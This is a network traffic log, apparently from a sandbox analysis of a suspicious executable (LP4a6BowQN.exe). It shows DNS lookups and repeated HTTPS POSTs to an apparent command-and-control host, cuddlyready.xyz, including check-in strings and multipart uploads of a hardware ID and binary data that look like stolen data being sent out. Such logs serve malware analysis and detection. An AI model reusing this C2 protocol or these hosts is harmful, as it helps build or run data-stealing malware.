                                                                                                                                                        Dec 23, 2024 08:19:36.513923883 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.661659002 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.661684990 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.661798000 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.661815882 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.662024975 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.662369013 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.668097019 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.668114901 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.668158054 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.668165922 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.668200970 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.675460100 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.675501108 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.675527096 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.675534964 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.675569057 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.675594091 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.681997061 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.682022095 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.682070971 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.682079077 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.682110071 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.682130098 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.682133913 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688548088 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688570976 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688599110 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.688606024 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.688631058 CET49775443192.168.2.716.182.101.249
                                                                                                                                                        Dec 23, 2024 08:19:36.694741011 CET4434977516.182.101.249192.168.2.7
                                                                                                                                                        Dec 23, 2024 08:19:36.694792986 CET4434977516.182.101.249192.168.2.7
Timestamp                           | Source Port | Dest Port | Source IP   | Dest IP
Dec 23, 2024 08:19:02.067099094 CET | 55755       | 53        | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 08:19:02.217029095 CET | 53          | 55755     | 1.1.1.1     | 192.168.2.7
Dec 23, 2024 08:19:30.522562027 CET | 53640       | 53        | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 08:19:30.659388065 CET | 53          | 53640     | 1.1.1.1     | 192.168.2.7
Dec 23, 2024 08:19:32.752487898 CET | 59441       | 53        | 192.168.2.7 | 1.1.1.1
Dec 23, 2024 08:19:33.046616077 CET | 53          | 59441     | 1.1.1.1     | 192.168.2.7

Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                           | Type           | Class       | DNS over HTTPS
Dec 23, 2024 08:19:02.067099094 CET | 192.168.2.7 | 1.1.1.1 | 0x92f0   | Standard query (0) | cuddlyready.xyz                | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:19:30.522562027 CET | 192.168.2.7 | 1.1.1.1 | 0x8486   | Standard query (0) | bitbucket.org                  | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:19:32.752487898 CET | 192.168.2.7 | 1.1.1.1 | 0xd46b   | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false

Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code   | Name                           | CName                        | Address        | Type                   | Class       | DNS over HTTPS
Dec 23, 2024 08:19:02.217029095 CET | 1.1.1.1   | 192.168.2.7 | 0x92f0   | No error (0) | cuddlyready.xyz                |                              | 104.21.32.96   | A (IP address)         | IN (0x0001) | false
Dec 23, 2024 08:19:02.217029095 CET | 1.1.1.1   | 192.168.2.7 | 0x92f0   | No error (0) | cuddlyready.xyz                |                              | 172.67.150.173 | A (IP address)         | IN (0x0001) | false
Dec 23, 2024 08:19:30.659388065 CET | 1.1.1.1   | 192.168.2.7 | 0x8486   | No error (0) | bitbucket.org                  |                              | 185.166.143.49 | A (IP address)         | IN (0x0001) | false
Dec 23, 2024 08:19:30.659388065 CET | 1.1.1.1   | 192.168.2.7 | 0x8486   | No error (0) | bitbucket.org                  |                              | 185.166.143.48 | A (IP address)         | IN (0x0001) | false
Dec 23, 2024 08:19:30.659388065 CET | 1.1.1.1   | 192.168.2.7 | 0x8486   | No error (0) | bitbucket.org                  |                              | 185.166.143.50 | A (IP address)         | IN (0x0001) | false
Dec 23, 2024 08:19:33.046616077 CET | 1.1.1.1   | 192.168.2.7 | 0xd46b   | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com         |                | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:19:33.046616077 CET | 1.1.1.1   | 192.168.2.7 | 0xd46b   | No error (0) | s3-1-w.amazonaws.com           | s3-w.us-east-1.amazonaws.com |                | CNAME (Canonical name) | IN (0x0001) | false
Dec 23, 2024 08:19:33.046616077 CET | 1.1.1.1   | 192.168.2.7 | 0xd46b   | No error (0) | s3-w.us-east-1.amazonaws.com   |                              | 16.182.101.249 | A (IP address)         | IN (0x0001) | false
Dec 23, 2024 08:19:33.046616077 CET | 1.1.1.1   | 192.168.2.7 | 0xd46b   | No error (0) | s3-w.us-east-1.amazonaws.com   |                              | 3.5.21.138     | A (IP address)         | IN (0x0001) | false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.73A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com16.182.100.153A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.129A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.30A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com16.182.36.113A (IP address)IN (0x0001)false
                                                                                                                                                        Dec 23, 2024 08:19:33.046616077 CET1.1.1.1192.168.2.70xd46bNo error (0)s3-w.us-east-1.amazonaws.com16.182.107.33A (IP address)IN (0x0001)false
                                                                                                                                                        • cuddlyready.xyz
                                                                                                                                                        • bitbucket.org
                                                                                                                                                        • bbuseruploads.s3.amazonaws.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:03 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: cuddlyready.xyz
2024-12-23 07:19:03 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-23 07:19:04 UTC | 1133 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:19:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=4c8gi0edd82gd0o712h24jb3op; expires=Fri, 18 Apr 2025 01:05:43 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZzCWZwaDTzQ1uG3Ckq%2Fgs2yY%2FAibQ5ayrz%2FVgj8UpDbXuh6g%2BSmUp%2FBoVxWtj7Fnokr46axztzdKwPfkhSm1NHSaVwnJ3Tl8DEW1Ozk5v%2BtJZBMu5oV3kz7%2Fu1OD%2F6mD1M%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6694c88abd1851-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1535&rtt_var=582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=1902280&cwnd=214&unsent_bytes=0&cid=916e5633bac12acc&ts=762&x=0"
2024-12-23 07:19:04 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-23 07:19:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:05 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 53
Host: cuddlyready.xyz
2024-12-23 07:19:05 UTC | 53 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 07:19:11 UTC | 1122 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Dec 2024 07:19:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=aks1qvtqhhrubif3phc9nfnk97; expires=Fri, 18 Apr 2025 01:05:50 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZyqOJ3kEMU8lcIH1ly%2BbXXC0p4tA5J5jgpY6FBWrucpPH0uG9HAsC0tBVLVp4p8YRNVTvy4nCtvdE864DJJBQgCytHKZqJngUE8PeJoOzFR7ANz147qtdyu4rgk4g%2F49pOs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f6694d5ae5741ad-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1550&rtt_var=608&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=952&delivery_rate=1762220&cwnd=189&unsent_bytes=0&cid=a1d3428697b5805c&ts=5940&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49713 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:13 UTC | 279 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=69HI2EZ9KAF5WW7F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 12838
Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:13 UTC12838OUTData Raw: 2d 2d 36 39 48 49 32 45 5a 39 4b 41 46 35 57 57 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 39 48 49 32 45 5a 39 4b 41 46 35 57 57 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 39 48 49 32 45 5a 39 4b 41 46 35 57 57 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                        Data Ascii: --69HI2EZ9KAF5WW7FContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--69HI2EZ9KAF5WW7FContent-Disposition: form-data; name="pid"2--69HI2EZ9KAF5WW7FContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-12-23 07:19:14 UTC | 1123 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:13 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=4vlln2goci8t38vlg881ek0rlu; expires=Fri, 18 Apr 2025 01:05:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=azpYOApbgz8T2mXTX6rueiaXBBE62%2FSU7viptVPbRuDtCzpJ6C5JjmBc27CxsidMjiG7KFm1tXeNMGkrjcmsB0ASYTxmLkxwD2uGWVmi7hNQscAUQ34P9ZUDlhscyq1FkK0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f6695040aac42d5-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1547&rtt_var=608&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13775&delivery_rate=1761158&cwnd=221&unsent_bytes=0&cid=3dde522d238e8cc0&ts=1014&x=0"
2024-12-23 07:19:14 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f ok 8.46.123.189
2024-12-23 07:19:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49719 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:15 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=1TVB1K1GX36I
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 15046
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:15 UTC15046OUTData Raw: 2d 2d 31 54 56 42 31 4b 31 47 58 33 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 54 56 42 31 4b 31 47 58 33 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 54 56 42 31 4b 31 47 58 33 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 31 54 56 42 31 4b 31 47
                                                                                                                                                        Data Ascii: --1TVB1K1GX36IContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--1TVB1K1GX36IContent-Disposition: form-data; name="pid"2--1TVB1K1GX36IContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--1TVB1K1G
2024-12-23 07:19:16 UTC | 1125 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:16 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=4d43ob3melqttdkem4tgjiu3h5; expires=Fri, 18 Apr 2025 01:05:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPBYAPnYJx2suRl7VWAuylVN41CLZwnIA1dKbY724ZV8QjOs4R%2F2vSHfBIwhCPjTlzTFcnbF83nmF6kgzhfoswdu3NooL3gz9nSl4pwM%2B1ug2SZzat6SRr102n8uMRhYoS8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f669514af3c41af-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1593&rtt_var=601&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15979&delivery_rate=1817050&cwnd=224&unsent_bytes=0&cid=f82f842d568b7645&ts=984&x=0"
2024-12-23 07:19:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f ok 8.46.123.189
2024-12-23 07:19:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49725 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:18 UTC | 278 | OUT | POST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=9SL1K37UU7GIEZY
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 20389
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:18 UTC15331OUTData Raw: 2d 2d 39 53 4c 31 4b 33 37 55 55 37 47 49 45 5a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 53 4c 31 4b 33 37 55 55 37 47 49 45 5a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 53 4c 31 4b 33 37 55 55 37 47 49 45 5a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                        Data Ascii: --9SL1K37UU7GIEZYContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--9SL1K37UU7GIEZYContent-Disposition: form-data; name="pid"3--9SL1K37UU7GIEZYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                        2024-12-23 07:19:18 UTC5058OUTData Raw: 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0
                                                                                                                                                        Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
2024-12-23 07:19:19 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:19 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=j69ea2rvce9ckafvn66o3p89me; expires=Fri, 18 Apr 2025 01:05:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UG1Hp5rQ8zb5vJdbiUFdw2efFETEVzRDeI%2BYIEvt37uIbC6YhJ6qX2oyzYJLZF9di4%2FAm1PG3HLQN4C%2FsJC8m8nWmOXJ0BfeinA0bOXHwvIgBDc7pIIDRL2Ju1qciB130%2BA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f66952449a17271-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2000&rtt_var=767&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21347&delivery_rate=1460000&cwnd=225&unsent_bytes=0&cid=e2bd91cfdae43308&ts=976&x=0"
2024-12-23 07:19:19 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: f ok 8.46.123.189
2024-12-23 07:19:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49735 | 104.21.32.96 | 443 | 7624 | C:\Users\user\Desktop\LP4a6BowQN.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:19:21 UTC | 270 | OUT | POST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=6WVH1GHH
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 1173
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:21 UTC1173OUTData Raw: 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                        Data Ascii: --6WVH1GHHContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--6WVH1GHHContent-Disposition: form-data; name="pid"1--6WVH1GHHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--6WVH1GHHContent-Di
2024-12-23 07:19:21 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:21 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=9d8b0i4ndo2cftvsqpcsu2evuk; expires=Fri, 18 Apr 2025 01:06:00 GMT; Max-Age=9999999; path=/
